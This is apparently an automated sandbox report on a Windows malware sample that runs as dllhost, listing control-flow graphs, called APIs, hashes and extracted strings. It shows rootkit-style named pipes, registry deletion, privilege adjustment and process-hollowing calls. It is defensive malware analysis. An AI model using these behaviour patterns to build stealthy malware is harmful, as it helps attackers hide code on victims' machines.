                                                  • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 116 140003204-140003225 117 14000322b 116->117 118 14000341d-140003423 116->118 119 140003231-140003237 117->119 120 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 117->120 121 140003599-1400035bd ReadFile 118->121 122 140003429-14000342c 118->122 127 140003382-140003384 ExitProcess 119->127 128 14000323d-140003240 119->128 125 140003652-140003664 120->125 126 1400033c9-1400033da 120->126 121->125 129 1400035c3-1400035ca 121->129 123 140003432-140003438 122->123 124 14000358f-140003594 call 140001f7c 122->124 130 140003534-140003547 call 1400020fc 123->130 131 14000343e-140003441 123->131 124->125 126->125 132 1400033e0-140003409 call 140001868 * 2 126->132 134 140003246-140003249 128->134 135 1400032ea-140003315 RegOpenKeyExW 128->135 129->125 136 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 129->136 130->125 158 14000354d-14000355c call 1400020fc 130->158 137 140003443-140003449 131->137 138 140003480-140003491 call 1400020fc 131->138 168 14000340e-140003416 132->168 144 1400032db-1400032e5 134->144 145 14000324f-140003252 134->145 141 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 135->141 142 140003317-14000334d RegDeleteValueW * 3 135->142 155 14000360d-140003613 136->155 156 14000363e-14000364c GetProcessHeap HeapFree 136->156 137->125 148 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 137->148 138->125 167 140003497-1400034b9 ReadFile 138->167 141->125 142->141 144->125 153 140003254-14000325a 145->153 154 1400032ce-1400032d6 145->154 153->125 162 140003260-140003284 ReadFile 153->162 154->125 155->156 164 140003615-140003627 155->164 156->125 158->125 182 140003562-14000358a ShellExecuteW 158->182 162->125 163 14000328a-140003291 162->163 163->125 170 140003297-1400032c9 call 140001868 * 2 163->170 171 140003629-14000362b 164->171 172 14000362d-140003635 164->172 167->125 175 1400034bf-1400034c6 167->175 168->132 176 140003418 168->176 170->125 171->172 179 140003639 call 140001eec 171->179 172->164 180 140003637 172->180 175->125 183 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 175->183 176->125 179->156 180->156 182->125 183->156 188 140003510-14000351c 183->188 188->156 191 140003522-14000352f call 140002434 188->191 191->156
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                  • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                                  • API String ID: 4225498131-1538754800
                                                  • Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                                                  • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                                  • Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                                                  • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                  • String ID:
                                                  • API String ID: 4084875642-0
                                                  • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                  • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                                  • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                  • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                  • String ID:
                                                  • API String ID: 3197395349-0
                                                  • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                  • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                  • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                  • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                  • String ID: .text$C:\Windows\System32\
                                                  • API String ID: 2721474350-832442975
                                                  • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                  • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                                  • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                  • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                  • String ID: M$\\.\pipe\$rbx-childproc
                                                  • API String ID: 2203880229-2840927681
                                                  • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                  • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                                                  • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                  • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 243 140002cb0-140002cba 244 140002cbd-140002cd0 call 140002300 243->244 247 140002cd2-140002cdb Sleep 244->247 248 140002cdd-140002cea ConnectNamedPipe 244->248 247->244 249 140002d21-140002d26 Sleep 248->249 250 140002cec-140002d0d ReadFile 248->250 251 140002d2c-140002d35 DisconnectNamedPipe 249->251 250->251 252 140002d0f-140002d14 250->252 251->248 252->251 253 140002d16-140002d1d call 140003204 252->253 254 140002d1f 253->254 254->251
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                  • String ID: \\.\pipe\$rbx-control
                                                  • API String ID: 2071455217-3647231676
                                                  • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                  • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                                                  • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                  • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 264 140003668-1400036bc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 265 1400036be-1400036d1 K32EnumProcesses 264->265 266 1400036d3-1400036e2 265->266 267 14000371b-140003724 SleepEx 265->267 268 1400036e4-1400036e8 266->268 269 14000370c-140003717 266->269 267->265 270 1400036ea 268->270 271 1400036fb-1400036fe call 1400031c4 268->271 269->267 272 1400036ee-1400036f3 270->272 275 140003702 271->275 273 1400036f5-1400036f9 272->273 274 140003706-14000370a 272->274 273->271 273->272 274->268 274->269 275->274
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                  • String ID:
                                                  • API String ID: 3676546796-0
                                                  • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                  • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                                  • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                  • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                  • String ID:
                                                  • API String ID: 1323846700-0
                                                  • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                  • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                                  • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                  • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 288 1ef0922f598-1ef0922f5b3 289 1ef0922f5b6-1ef0922f5df 288->289 290 1ef0922f5e1-1ef0922f5e6 289->290 291 1ef0922f5eb-1ef0922f5f4 289->291 292 1ef0922f676-1ef0922f67f 290->292 293 1ef0922f5f6-1ef0922f5f9 291->293 294 1ef0922f60c 291->294 292->289 298 1ef0922f685-1ef0922f69f 292->298 295 1ef0922f605-1ef0922f60a 293->295 296 1ef0922f5fb-1ef0922f603 293->296 297 1ef0922f611-1ef0922f622 GetStdHandle 294->297 295->297 296->297 299 1ef0922f651-1ef0922f669 297->299 300 1ef0922f624-1ef0922f62f GetFileType 297->300 299->292 302 1ef0922f66b-1ef0922f66f 299->302 300->299 301 1ef0922f631-1ef0922f63c 300->301 303 1ef0922f645-1ef0922f648 301->303 304 1ef0922f63e-1ef0922f643 301->304 302->292 303->292 305 1ef0922f64a-1ef0922f64f 303->305 304->292 305->292
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                  • Instruction ID: ffbac369c18f143fc03c3b12c9ce07c9621191a5ebff605c147a08a62b497c6a
                                                  • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                  • Instruction Fuzzy Hash: 50312F32614A84A1E7608B15D6802ED6762F385BA0F69132DEF7A573F1EB35D4A2D340

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 306 1ef0942f598-1ef0942f5b3 307 1ef0942f5b6-1ef0942f5df 306->307 308 1ef0942f5e1-1ef0942f5e6 307->308 309 1ef0942f5eb-1ef0942f5f4 307->309 310 1ef0942f676-1ef0942f67f 308->310 311 1ef0942f5f6-1ef0942f5f9 309->311 312 1ef0942f60c 309->312 310->307 313 1ef0942f685-1ef0942f69f 310->313 314 1ef0942f605-1ef0942f60a 311->314 315 1ef0942f5fb-1ef0942f603 311->315 316 1ef0942f611-1ef0942f622 GetStdHandle 312->316 314->316 315->316 317 1ef0942f651-1ef0942f669 316->317 318 1ef0942f624-1ef0942f62f GetFileType 316->318 317->310 319 1ef0942f66b-1ef0942f66f 317->319 318->317 320 1ef0942f631-1ef0942f63c 318->320 319->310 321 1ef0942f645-1ef0942f648 320->321 322 1ef0942f63e-1ef0942f643 320->322 321->310 323 1ef0942f64a-1ef0942f64f 321->323 322->310 323->310
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                  • Instruction ID: 9c60be35d56bdd615056dc63be87aeb21c82862214a49e02f75b78d9983f1d10
                                                  • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                  • Instruction Fuzzy Hash: 11316035614AC491EB608B14D5802AD2662F385BB0FE8C3ADEF6A073E1DB36D4A7C340

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 485612231-0
                                                  • Opcode ID: 333a489e8dcc8eedcd0e7bef734eff4b78bc2a86995d597fe8532a0c7997e2df
                                                  • Instruction ID: 899f326030a30a20e0b98c617e46ebe9c2641ac0e54861ab3f05272fc3d7827e
                                                  • Opcode Fuzzy Hash: 333a489e8dcc8eedcd0e7bef734eff4b78bc2a86995d597fe8532a0c7997e2df
                                                  • Instruction Fuzzy Hash: D3E0EC78F016C042FF1867B2D8553AC01A37BD9765F8CC43CBE0A822E7F91984938250
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 0850b86c745a97c39c9faefd0703bc2872dc2d22f4bcb5242e16983652158e04
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: 6991F873B0159887EB548F25D4207BDB392F794BD4F5C8139AE6A4778AEA34D813C710

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 332 140002d38-140002d3c call 140002d4c 334 140002d41-140002d43 ExitProcess 332->334
                                                  APIs
                                                    • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                                    • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                                    • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                                    • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                                    • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                                    • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                                    • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                                    • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                                    • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                                    • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                                    • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                                    • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                                  • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                                  • String ID:
                                                  • API String ID: 3805535264-0
                                                  • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                  • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                  • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                  • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                  • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                  • API String ID: 1036100660-1371749706
                                                  • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                  • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                                                  • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                  • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                  • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                                                  • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                  • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 8670bdbb8ae2e7a4211c347d347ec83acc948b2d36ee9ed52bdec45eade8d9ce
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: B3B15A322106D1A2EB64CF25D5407EDA3A6F784F94F58502EFE0953B9AEE39CD82C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
